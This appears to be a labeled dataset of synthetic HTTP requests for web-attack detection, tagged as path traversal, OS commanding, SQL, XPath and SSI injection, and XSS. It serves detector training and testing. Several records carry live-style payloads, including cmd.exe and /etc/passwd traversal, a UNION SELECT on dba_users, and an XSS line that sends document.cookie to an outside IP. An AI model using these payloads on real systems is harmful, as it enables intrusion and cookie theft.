Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2312
Client-ip: 141.6.207.75
Cookie: snrnnm=sutw;2leoi7=8e<Ntoe;adminDW_oh=nlXdo~cils-;etd9ribtwt=69079;nk1ihsjtoQpt9=3801857;smeoeul2=2322
Cookie2: $Version="7"
Date: Mon, 19 Oct 09 08:14:05 CET
ETag: W/"@U5uH5BLCJXO7aQTFruz"
Expect: SkhguTri
From: rtuAdC@8eshsl.biz
If-Modified-Since: Wed, 07 Feb 07 04:17:40 GMT
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: *
If-None-Match: "UhiOiQZyY75r6DdjYco"
If-Range: Sat, 08 Jan 05 14:01:02 UTC
Max-Forwards: 0225
MIME-Version: 0.8
Pragma: a41wY7i='E'
Proxy-Authorization: Digest username="eaorh"
Authorization: wahscE w1funtlr=bta3
Range: -972278
Referer: http://a6eoab.net/aoceiE7a/9tlda/mdwnee/wb7e.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: t8dRofp http://www.aeenq.it
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: identity
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44968
Start - Id: 45411
class: PathTransversal
POST /t2B2Z@oBdDecB7S/hhIUeT7e/i5Im7E-jhqU4eZ/2oauhtaidtrrtTtdg/nSeisrEtbawRedek/sl0hhiehHurn/esCgcs4twiettse9.tiff? HTTP/1.1
Content-Length: 308
Content-Language: toyndalo
Content-Encoding: deflate
Content-Location: http://epri7t.de/Ibpsh/otaltnn/lhsMjGfa.swf
Content-MD5: eWF0U3VSc2V1dGlhbXRobw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: www.cdehndeaLo.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: aEssn-Eyt, Qa-l, iaihg-rn;q=0.4
Cache-Control: only-if-cached
Client-ip: 198.43.126.27
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="227"
Date: Thu, 20 May 04 23:29:41 CET
ETag: "h2GELE9QWj0NUvazBiN"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 28 May 05 04:10:57 UTC
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Tue, 31 Oct 06 07:47:17 CET
Max-Forwards: 93
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest uri=/rerrx/d7rscBo.bin
Range: -40
Referer: /6tiemoi/2dtrnn/tehnsor/novzaeyi.aspx
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: nawJ23n1I http://www.lbahp.org
UA-CPU: PowerPC
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QTf1ywi%udK@E=j%3Ehuo2xpea+cidfe5oU&W1Sc=+shmny%29NOq&EBiframeS9eGWRc0au=ol7&fctr=gquh6&6le=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fic%2Fanleesel%2Fisneeris%2Fndllme.dll&eeciD7t=ladminn%7EeotanDteIedHst&4V-my=9ss%40&ptDdmdakaamt=tit&j0@Bperlw=yzD&52mildd0tg2ml=5&tY6aAfbd=00600055&yC1.gQF-joXS=esnoxgtn

End - Id: 45411
Start - Id: 43962
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 239.51.24.164:2
Connection: keep-alive
Accept: video/mpeg;q=0.0, text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-W;q=0.2, aesw6iel-Nl;q=0.3, C-iaaa5;q=0.8
Cache-Control: max-stale=1
Client-ip: 117.249.118.133
Cookie: e5Tan3dt4tAh=88228;sE28uUMH=2858544684
Cookie2: $Version="45"
Date: Wed, 02 Aug 06 05:14:39 UTC
ETag: "KgvdimAZzmUx0@VVDP"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Thu, 08 Apr 10 24:10:30 UTC
If-Match: "a9QcuSdMk64JbAXWMx"
If-None-Match: "2_NIIL96Xutd0u08RDJp"
If-Range: "3bXCa8ykymYIGI.C1o"
Max-Forwards: 719
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest opaque="ntlogo"
Range: 97793-3,500796-0
Referer: /tnrdJ5.wav
TE: deflate,deflate;q=0.5,gzip;q=0.8
Trailer: Referer
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 3.0; eo-qL; rv:3.6.2) Gecko/65040132
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: 3.0 39.235.101.204, 8.9 68.204.108.232, HTTP/6.2 145.167.90.217
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43962
Start - Id: 45654
class: PathTransversal
GET /wIeh_4jh0WDN9/i9@Ev6s/rsBQe2dPAXrVFwH.mdb?Ygee2es8ienotn=d%3A%5Cautoexec.bat&i4n3=Oirj&utbOmMnrnso8aoD=iah5+&7Btorie=241 HTTP/1.1
Host: www.Et9gaThd.org
Connection: 61wIsa
Accept: */*
Accept-Charset: isiri-3342;q=0.7
Accept-Encoding: gzip;q=0.2, deflate;q=0.3
Accept-Language: hhpyesn-rtceeer, oeetre2-fieta;q=0.5, t8Aa9g-sanwtms;q=0.1, sLnJm-5Ziaera
Cache-Control: max-stale
Client-ip: 49.59.138.232
Cookie: eohed=ccmw<wat)es;vbnd_d@=a4rrticwf;testvRu3o=hWsxskt log;style60X4IkH=39902644
Cookie2: $Version="7"
Date: Sat, 10 Jul 04 02:23:36 UTC
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Sat, 28 Jan 06 14:39:48 CET
If-Match: *
If-None-Match: "CZjwIEyfouvKjLHbh"
If-Range: "y_@U.CcJySwlaWY9elPS"
Max-Forwards: 5452
MIME-Version: 6.6
Pragma: td=acseH4
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: -32,-46611
Referer: /itiO4les/eaie/rtmse/rbr6ZIR/srwnaspe.mdb
TE: trailers,chunked;q=0.0
Trailer: If-Range
User-Agent: nO52A1kv_ http://www.coeBcoa.uk
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45654
Start - Id: 41344
class: SqlInjection
GET /svJ288MmTFjg/fz3R_BCzposition8KVxu6/eEgniasleh/qpsHcowtcuv/0avpQUK.jpg?8arRfHs62wje=s%29&eeoatf4n3Qpb=4954&ng=2reitdeace6nsP&reedi6=nhsY&Nmeipuz=%3F&TraOhhgczeahrl=o1oi7wottir%2F0&DvhavingWZPaccess_logV=68285&ri3tn5fa=581834436&stbuooarhbe=6956751&orINaOeaNr=89200&vi=j&5nlostt8=dieoercL9swo HTTP/1.1
Host: www.hfjpcfut.org
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, compress;q=0.9, gzip, gzip
Accept-Language: hnqt-N, mcyfomke-n4;q=0.9, jijmyc2u-3nesib;q=0.2, fnyk-deaihs;q=0.8, i-wqhhweer;q=0.9
Cache-Control: hDza=taiAuxf
Client-ip: 104.231.92.120
Cookie: uodntulxtnea=nH7'/**/UNION/**/SELECT/**/Trhzetma/**/FROM/**/dba_users/**/WHERE/**/pt4not/**/like/**/'%25;uaied=189388
Date: Thu, 29 Nov 07 21:17:34 UTC
ETag: "PpE56o.F@na6LlCh"
Expect: hYr341a
If-Modified-Since: Thu, 02 Feb 06 12:26:36 UTC
If-Unmodified-Since: Wed, 08 Feb 06 10:29:45 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Jun 06 10:12:50 GMT
Max-Forwards: 94
Pragma: enhvt='l7h'
Authorization: NTLM b2RpaW5lZXB5c3Jud251dHVvb25hdHRZZWRlb1duc3NsaG5s
Range: 49-9
Referer: http://www.I8N0E.org/6agsmr1/imhhlrh.jpeg
TE: chunked,deflate
Trailer: Accept
User-Agent: aadtadt
UA-OS: Win9x
Via: 5.1 13.2.179.252, 1.9 www.teey4iee.jpeg
Transfer-Encoding: hpeob; haisrra=midtu
Upgrade: rTnh/2.4
Warning: 354 89.219.8.45:4 "tSnrod3eibOiat" "Sat, 07 Apr 07 08:11:53 CET"
X-Forwarded-For: 68.229.77.119
X-Serial-Number: 6950157173290269594

null

End - Id: 41344
Start - Id: 49178
class: XPathInjection
GET /@childe/BnaEUooeSIdigQaettu/ussd5bbYs4IbeT/cehvmtrmttj/igFJzJ0IlJp.Q@/eeWRU_PTJxe9i/ofU_kLHie/xwwth3rsqiloeemmn5/aNpGCxRT5MvupyE3chzE/iYMcaBzmu_eMeO_YaU3n/oehly.jpeg?ea2drd1ifc=it&rllapui5s=xLybp&@MM@-=l7pTrNo%5Ce%3Aahe&3g@4bUhttpinsertujh=8tirebe&Ese=xfuAm%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+%27iDwerq%27++%3D++%27&lebrtiBnastztc=hiahr1o6pxniaiji&XporwupdateFmwzSn=iy&r1O=42522436&ljmoam=teEtasnqtos&BrOBdhoptj5L=22 HTTP/1.0
Host: 115.193.18.195
Connection: close
Accept: text/xml, image/*, text/plain;q=0.4
Accept-Charset: windows-1253, iso-8859-8-i;q=0.1, big5;q=0.9, iso-8859-5;q=0.9, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 222.14.181.160
Cookie: rke=spqelIvtsetldiw;4LNlqiul6eidana=cIezh9treoo;tcOtnaEb2neOD=reann+a;4osd5m=eco4Y;bytei6szas=a;eihinnsl3Ilm=62622165
Cookie2: $Version="1"
Date: Wed, 23 Apr 08 16:49:31 GMT
ETag: "I4LM-0MgNgkmOnkc-s3"
Expect: 100-continue
From: iahsis@optiai.de
If-Modified-Since: Mon, 31 Dec 07 23:10:39 CET
If-Unmodified-Since: Wed, 04 May 05 22:06:44 UTC
If-Match: "grTzsfzHiMaVnB-"
If-None-Match: "0Yg8f6_vXNgCq-M-twq0"
If-Range: Sat, 09 Jan 10 09:18:39 UTC
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: /srrhu/e7da/Haclneo.shtml
TE: chunked
Trailer: Host
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 8.3; tl-ha; rv:8.4.8) Gecko/37460664
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: diam/3.6 www.saZi.jpeg, hLotn/5.8 241.155.11.154, 9.3 26.163.213.25
Transfer-Encoding: deflate
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49178
Start - Id: 50039
class: XPathInjection
PUT /sZKME/9ru1iwi/rnodebKx/tmp935ftp83idiAFQ0dN/mmqc85Re4e/e4eo/Vfacgeb6d0uefaeSkyai/e7zyeslsrdpfh7s2/htaccesMRuOGe820.htm? HTTP/1.0
Content-Length: 174
Content-Language: o,rfattt,e1e
Content-Encoding: deflate
Content-Location: /spfntx/uaras0BL/6Nco.jpeg
Content-MD5: cm1lcmE1ZGV0ZTNlMGlkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jan 07 21:44:28 CET
Last-Modified: Thu, 03 Apr 08 21:14:56 GMT
Host: www.fhee.biz
Connection: close
Accept: video/mpeg, video/*;q=0.2
Accept-Charset: iso-8859-3;q=0.0, windows-1251
Accept-Encoding: 
Accept-Language: anuaov'     or    6  <   count(path/child::*)     or    'spsti' =  '
Cache-Control: no-transform
Date: Wed, 17 Nov 04 07:39:11 GMT
Expect: 100-continue
If-Modified-Since: Sun, 16 May 04 19:49:18 GMT
If-Unmodified-Since: Fri, 21 Oct 05 20:17:02 GMT
If-None-Match: "pX8p4WY8Fy8gf1M-nSFX"
If-Range: Sun, 31 May 09 05:36:09 UTC
Max-Forwards: 8
MIME-Version: 4.2
Pragma: imytsHm=zgfEaSem
Proxy-Authorization: Digest realm
Authorization: NTLM YmRuZWVhZWVyd3kydHNhb2NmS01oZW95MmRJbGxrc2lpdDFv
Referer: http://www.F5aRi.de/tlasrm.mdb
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 9.4; rm-ne; rv:0.0.3) Gecko/57490806
UA-CPU: MIPS
UA-OS: Solaris
Via: HTTP/8.4 99.15.121.86, HTTP/0.9 74.184.16.68
Warning: 506 www.yot0sp.css:0 "13chsryancyt" "Sat, 14 Aug 04 10:36:35 CET"
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lv1lWVX7m9C=soEwfeuadoBidaeh2&orqof=(&(i&awinntEy=esse&UgnIowurCd0=bta:en&maaamteha=065342&ttc6er42tss7d7g=ie2SoreetcC&yt=SiZapuir&n9Ehtna=tQ0IJ&oAuGfiframeaa7JX=oNz0

End - Id: 50039
Start - Id: 46408
class: PathTransversal
GET /ebtshPevdyrp/lrh3DjF20Ht/WnvjIZselectb64ncDP7/az2nm9zYa/wnnLalFoeigerooats.css?ecyeonl3atmfe0=loa&syimuOfmeaeobp=0&e4nnlcqa=dd%3D&iWw=Mpecatdiea3r&.Y@0X4AZz=112828&o8=oe3boomeisb&isPTeis2f1ja=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&FLNr0doNSPHinput=zbetween&nd=3233813774&tneeobHa7idmt3i=sRc HTTP/1.0
Host: 170.149.100.35
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 43.17.188.82
Cookie: gMrhi3ae6aks=45qaeEo;rde4jiemgi4gwC=745;qedo8tSe0icNw=umawDsnnsQhIoac;H-_zPI0gNkcJ=4860;tedrbRfae=tilibBh
Cookie2: $Version="2"
Date: Thu, 22 Dec 05 09:31:17 UTC
ETag: "nzNGDS.22k6TV@-"
Expect: 100-continue
From: wegeqhea@e2xmcrate.uk
If-Modified-Since: Tue, 13 Sep 05 18:01:09 UTC
If-Unmodified-Since: Thu, 25 Jun 09 09:30:55 CET
If-Match: "eEkAGWc@H9GgtREHtdi"
If-None-Match: "Jdea23sTa5Rk9CCH5m"
If-Range: *
Max-Forwards: 9377
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="2bBc1984bDE0f56e49cE74EDa6cF9C8c"
Authorization: aqaf cysTse=aauaoyn
Range: 0-,-1441,-234089
Referer: /ilsqip/raHn.bin
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/8.6 (compatible; Konqueror/5.3; Linux i586; tjeff)
UA-CPU: x86
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: FTP/4.4 www.pddl4t8.htm, 2.9 www.gtnata.shtml:68, FTP/4.7 184.175.141.134
Transfer-Encoding: compress
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46408
Start - Id: 48877
class: XPathInjection
GET /casosSyAhL9enrctcxf5/Xlog82T_/d1q_P5L@aY3C--KTV/DiGrXhx.Ssusrd/servicesE73lQ4aI6UCFX/PkwZIp89/pu/eui7oteso/dVpassthruOOaHz33qTbJ.html?ehetnhn=Mleup%27%5D++%7C++++P+%7C++++%2F%2Fuser%5B++++name%2Ftext%28++++%29+++%3D%27ytmie&dropzFlswcmd-e7=%7C%3D3nauoex&fxq7RX@whereVaq=0yrsofOeo&jbn1oeoel=czOjyMpVO49r&hapesnnuHoSu=%7Cogw7gna%24fo&pc9lhn0foatltw6=oWwZR&nHwd2ae=Cut&Rtpt=3378955884&nfots=teht2eu HTTP/1.1
Host: www.ngloe.st
Connection: innsr
Accept: application/*;q=0.8, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=7
Client-ip: 220.116.206.243
Cookie: bgsoundFErftpetcdocumentD=4382346007
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 10:29:52 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: 100-continue
From: SeqnAyso@nknWroo.ch
If-Modified-Since: Fri, 05 Sep 08 08:16:16 GMT
If-Unmodified-Since: Sun, 11 Oct 09 22:42:21 UTC
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Wed, 11 May 05 17:59:05 UTC
Max-Forwards: 197
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 41-,-69
Referer: /esnnrrh6/sAzetn/b3Ntdea/xotb/nesa.aspx
TE: chunked;q=0.0,trailers,trailers
Trailer: Accept-Charset
User-Agent: hhouaWdhr (fS-wvZrb; y2lmCDWN; hPu53qeaR0; u7.VVLB)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/8.0 233.213.228.119:658
Transfer-Encoding: dvsA
Upgrade: sot/2.1, durd/1.9, 3esnsy/4.2, ocnwu/9.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48877
Start - Id: 46846
class: XSS
PUT /tedbmnoisacht3cL69O/b9/niframex/CIXOHwOvtG3/r24njVnd/n6GBgs2QBjQCi2P0x/trDlppbm1elXeid0/mFTr22VnodedM/aEuy4QT5Wj624rUnsh8/cR5GY0hE123@7Jq1j-/ru/bR2Fe.php? HTTP/1.0
Content-Length: 371
Content-Language: Ehkr,vOkt
Content-Encoding: compress
Content-Location: http://www.zfr3is.gov/asreei/iidter/sdfarrSd/Meer.php
Content-MD5: a0x0dHVhOTdoNm1tc3IxUw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Dec 09 08:03:06 GMT
Last-Modified: Mon, 31 Aug 09 17:59:35 GMT
Host: www.yydcmho.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-ce
Accept-Encoding: gzip, compress;q=0.6, identity, identity
Accept-Language: h-Bidni1ss;q=0.1
Cache-Control: no-transform
Client-ip: 175.15.203.198
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Wed, 02 Mar 05 19:28:39 GMT
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Thu, 04 Jan 07 10:27:19 CET
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: *
If-None-Match: *
If-Range: "6w_gdrs.A4q_We2Ez.Fc"
Max-Forwards: 89
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: http://L0irvrdt.cz/8zHrdoi/vweT/hirH.css
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/7.8 (compatible; MSIE 5.8; Open BSD i586; cfksen)
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/0.8 171.91.229.27:70198, 8.1 199.243.97.31, HTTP/7.0 237.140.236.126
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 215 204.229.105.117 "et3oeam" "Mon, 16 Aug 04 19:15:26 CET"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

duTev=<img    src =  "mocha:[window.open('http://111.95.194.113/al.exe'+document.cookie);]      " >&hodofhes=htl&6Y1ad75bIse=hKlH&owgsaaA=a&sEhvmtq=awXx9J&oarnob=aXcm@vED&u8=83526305&tdsw=189295&snpaurtIaeew= mochachxrg&e0d=ams&Y-5TBkhtaccesC=(%+=snull&9oxxs=auwfaiePhyry&iGl8Redsux=2&ry8hkcsnev=sHAeuwaphec&unchaHrHewe=n-Mux

End - Id: 46846
Start - Id: 40799
class: SSI
GET /kJj_HtZbFxdy/0mhUcu.php3?9wgddr9prg=%3C%21--++%23odbc++++connect%3D%22ryyisa%2Cnioish%2Casa%22+++++++statement%3D%22select++++*+++from+++++eetI%22--%3E&G8E7RimgnaP=79&aaettahhsdaad=asitocwe&gkfxetislon=tmibncs2edia06Ctr HTTP/1.1
Host: www.Re5tNeludt.it:9929
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 154.27.72.55
Cookie: iiemy=y
Cookie2: $Version="44"
Date: Mon, 23 Jun 08 13:54:47 GMT
ETag: "Mkc9ZM08CabKyv1n"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Sun, 17 Apr 05 13:09:46 GMT
If-Unmodified-Since: Thu, 26 May 05 19:18:42 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.4
Pragma: itipoo='taehhoi9'
Proxy-Authorization: Digest username="easT"
Authorization: Basic ZWlzd3RpOnJjVGp0bzhx
Range: -473515,10127-9,-129281
Referer: http://www.exgdfaEt.net/tici/nytsLa.doc
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.5 (X11; U; Open BSD i386 8.8; pt-ee; rv:7.8.7) Gecko/75988934
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 8812x175
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: tNdwlL/6.5
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 17196143235816087076
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40799
Start - Id: 42877
class: OsCommanding
GET /K2%u/mt7lidenG/eo/4SAtyK/n92Xdk6.sampasswdUUT/yr/7auo1erelnaoieih/QCYzdevalxMrFK/thQH.epNhkpcDZA7v_K/ej52z@YuaBQGayoOnR/RbgAMBEsa1P.gif?copyB7replace=duvZMb&srlst=nJDNgQ668.W2&VSihMe=a%28eti-rrh&kEoa3e=qo%40&a1EIiqnzOnto=psamqscuhx8xtm&tsstahnhspt=s%3Do%3DwPn%5CeiIlnph-tSdelete%28&moeeawpPcdimsOA=c+c&2M81aetizro9ln=rirmHOnDiero&RthLltuSnoss=2KknCA4C&drbdn554T=t2fii&yr=7599&2iffromZWG6pr=674&tmgliula=%7C++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C&oL6tQ1W=35 HTTP/1.0
Host: www.9ravlgg7.net
Connection: T6ewt80l
Accept: */*
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: cYei9t3j='lMi'
Cookie: se=ngst;xeh=rmlet;rqEewwsTxtcid=EpohPieqsjnbeFa6
Cookie2: $Version="443"
Date: Sat, 15 Mar 08 24:18:41 CET
ETag: W/"nErZ9x7YrYRGoxmbEQjD"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Thu, 01 Mar 07 14:54:41 GMT
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "AetJ3vyGNa.Y_EyF7"
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 4.5
Pragma: zphtork=q
Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Basic bGVhZTpzc0hTc3Vv
Referer: /wPeth/er0eiswI/nd3my2a/oh3r.png
TE: trailers,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: sCa7oElKou http://www.iIot9usi.biz
Via: tseh/1.7 184.105.55.99
Transfer-Encoding: tokeq6
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344

null

End - Id: 42877
Start - Id: 48544
class: XPathInjection
POST /oi5wcatCxml.sock_streamo7nE/BjntafaegrccTt/ec/Tneyhovertsatr/n.1CU2bPuQLgGKNVX.asp? HTTP/1.0
Content-Length: 315
Content-Language: m5r,asure,bM
Content-Encoding: identity
Content-Location: http://jiiW2.fr/n2niaer/lecshEOi.shtml
Content-MD5: ZWVlSE5oeTF0c2h0a25wbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 09:24:31 UTC
Last-Modified: Sun, 11 Mar 07 19:53:16 GMT
Host: www.b7kotennzn.com
Connection: keep-alive
Accept: image/gif;q=0.8, image/jpeg;q=0.9
Accept-Charset: x-mac-hebrew;q=0.5
Accept-Encoding: gzip, deflate, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 220.175.249.82
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="4"
Date: Thu, 01 Jul 04 23:30:40 GMT
ETag: W/"VEWmiSXDjK-PzOVZj6"
Expect: ynrsc=akpl
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Mon, 09 Feb 04 24:32:05 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 May 05 09:28:06 GMT
Max-Forwards: 55
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: rOl0ta 9ssa=Epiteonc
Authorization: NTLM NG5hYWU2bFR0ZTFsSnJsZWVmM0xoajR3c2VlbjFOMnM1ZnNvU1U=
Range: -3
Referer: http://www.aehe.biz/ee1to/zcfhn/puAud9p4/thtttiet.cgi
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 8.1; TS-ea; rv:9.6.6) Gecko/15786937
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/1.9 www.tGilfPw.jpeg, 4.2 www.rnse.js
Transfer-Encoding: identity
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
